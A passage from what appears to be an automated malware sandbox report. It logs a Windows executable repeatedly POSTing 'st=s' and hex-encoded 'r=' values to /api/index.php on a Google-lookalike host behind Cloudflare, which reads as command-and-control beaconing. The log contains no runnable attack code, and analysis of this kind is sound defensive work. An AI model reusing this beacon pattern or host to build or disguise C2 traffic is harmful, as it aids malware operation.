              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:31.007652998 CET827INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:30 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vz%2Fjw4bOibf2Bebtc%2BScJuvJ4rK%2BcfK8sAlYN9m%2BcmXK7WTExo6hCm7l5eWq8fObxZx4KWQM1JntfjBOJpMXBvnS7hoTXRVGs438Ls3XBL3xY3x8YV9em4YyY%2BO3aLlmipaSEGposy0e%2B0s8eAPniDbtOYTi4g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea92fe590d42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=756&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.550045104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:32.735523939 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:33.283407927 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:33 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvYBNezjy6CFZDIatxfsX5422z8Xzzw1N9ffzLJnWednqwMliWfPviH3%2BpDM7G4wJd0y2Rkl7YG7vhQ7Q0WEtGTaP1mNEXcR%2B0SbzNaZNDWjO7iskmIHZPpQOKMiXyq9EFMJOdA5vJTwj0Aog3lke2B63J31mQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea930d28657d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1947&rtt_var=973&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.550046104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:34.796565056 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:35.449184895 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:35 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xE0lfevhL4HrXqpxtqibluWLunpLtxvdSf6FC%2FVs9aSXfr4UV4WDhxd2nrHpI4Epho91r9xACWyZi6415nYM461CHr4Xlx2ZhG7lf%2FsdaTQX0Neo3yJMGUuv0AiT7eVvd0xCZZVwQ%2FhEOOp3YVPY5dThnG%2BTcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea931a1df743ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1823&rtt_var=911&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.550047104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:37.124619961 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:37.860440969 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:37 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85TkBxK%2FUMBYeHfxllZpjYPuyPWVn38%2FZKSqXYaVJKYWVAUzueYFHaSs32uiA8YSgBgben6LYzIwZyPGkuSpTX4iwnSts6rXPM5jb3sl%2FD4u3YKhEHhWyIDR0683AjjxbH9kPsDkpJJPCrZDowlnlbJJBXtG4A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9328a89d8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.550048104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:39.386770010 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:40.013513088 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:39 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c09T6%2FkuRBHbSPJdJJuFI%2BMLrGRWhiM%2F6X0fK50m%2FpZHNzAuMeOZX6O%2FX9ukqIRh7yNSMgOp3pD5Z8nTCnfG5iDKcJsAQ7lmKV3qbVghNspmITsoh9XhyKwiu8HFzrbd64vuc462UeJBGrYPsXQR7hytMmZWlg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93369d8a7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.550049104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:41.639642954 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:42.269740105 CET820INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:42 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ByUIYbOqMdx95Hos8IgSBMtJvjIICifyDuCAMk7Xeeq0sXWlih9KCwgH2iHwW%2FhU2On52Kt9X5MoDwi8V%2FBXygAEUJyTPTox%2B7U5uBJIjXdHM%2Bs8rFl7IOeqWPDMfy5Unx4Lhc24qL2Gn5P7M%2FpferGumFSOYw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9344c8ab7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2267&min_rtt=2267&rtt_var=1133&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.550050104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:43.862874031 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:44.462680101 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:44 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1NK9G8Cd0UT1ezn%2Bm5PK3rAan%2FHohK6OWj4Wk36xKcfE61gyxSdy283gshMgAoTV9hf4H4Qw6B3rwHwtBOqFsJPNC8h1h9%2BjkuXTu1yYRnmr6RwLCwz1vsfhRIM8vYUsqlJedUWUsUHC%2BJO9GEfdIX6Etbq4A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93526baa7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1938&rtt_var=969&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              76192.168.2.550051104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:46.124140024 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:46.756897926 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:46 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKGSlf1GmdViD6mBRbBet6GvCBRiydA%2BDw1Z1w%2BqrCYbZQKOmiKGeQIbduGvFUro3TMLU8BKa4aY6VB3UAQ%2BnmnQ8vU30QlBzGUUK3D3BYId0HsLiHBPzpb82L4bpB66W6p0hyIR%2Blqt28Rj5wJ9xa0MFrQ3rA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9360c8a3c443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              77192.168.2.550052104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:48.280689955 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:48.954159021 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:48 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDSKwfVogbQv83Zy1IIfAi%2FqUbYcns8tylQGrb7Xq0gGtUIwtlFuvnW5LANT5Vzuo%2Fv3ERVzuHHGblMnGVRDWsTkXg2RMvF9ez5Yznvst567D5Dmem%2F6tf1i6PgvpZ2X60E2ix18TnLXxgxzumg2gwhq%2BuoNpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea936e4877c443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              78192.168.2.550053104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:50.593051910 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:51.148322105 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:51 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo1kD4VQsIlGfu0jbxpDZVBhpO9zWEJn30qnYoSjKkqt6rBy4MKjJ21dcBXU5506zFAQ1tTgIeuXTNSqGB8cCNR65C3g87Q5JMPHJjCkgathVxXad%2BJDKbaxmyi%2BQ9JTQf70%2FXvc76vpZEflecbgYOdGGXAwBA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea937ccbb58c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1952&rtt_var=976&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              79192.168.2.550054104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:52.692282915 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:53.322114944 CET819INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:53 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLDj8shjNrMySbPm8e1QsAvhezEkTvcZRojLWeIh%2BH9MJxXq8JbFPRefP70KQf5aVzmMu1Ya7cltIw64A7CFBDTjNp2KRYDhQCfCGKoykC57n10jQfdRScoQN5jfqrMyeftyvL%2FREr3P5VhuCy5BWrpJLFp9tA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9389da8c7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1927&min_rtt=1927&rtt_var=963&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              80192.168.2.550055104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:55.013951063 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:46:55.671662092 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:55 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWL6fSRBqYJWRsj4J17eCMPVskdBnGza3TqtWBssb1SUxeN%2Ba6B82D1cim1vQWUSm3KL3d2cv4yLv6dB2dDw2flHzwl93mUrWU1EzC%2BrIDKm7qDopAutVQ1BQS%2B10kgt3v2ISqcN70Fip9YeNxFOnH13ItUEuA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9398794b43ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              81192.168.2.550056104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:57.186420918 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:46:57.840380907 CET827INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:46:57 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSkJzIQ6PBIMoixet9If7dWiAaWtNNQUXQkFffnmhDWi4F1MFpF9wsO8iteYJ%2BfVPU9LKtGb0p%2BsCSvmKN%2BrNu3VV%2Fo0wOqpdtN9nmAXF3dJCu86bgvQV4QWjxwlT%2FidHYtNDgAyTRv0KLgMB0NQ%2FpjFGdguIA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93a60d6242d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              82192.168.2.550057104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:46:59.476527929 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:00.166419029 CET818INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:00 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A91EEBuXndMqtotwkN4sOZk5qhYoCbGXk4FC7Woc8nu6EgV51sT3Y4o1s1NmVGWDsSAPJI9DPeWrcV7hQM2TjxrdRz7%2BJ1Z222jiPNNYi%2BufqkuR1XBSn1HC7pcVh63r7rac0ybMtFuky1rwLaISf0r1nG%2BTWg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93b49ae20f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=19605&min_rtt=19605&rtt_var=9802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              83192.168.2.550058104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:01.686073065 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
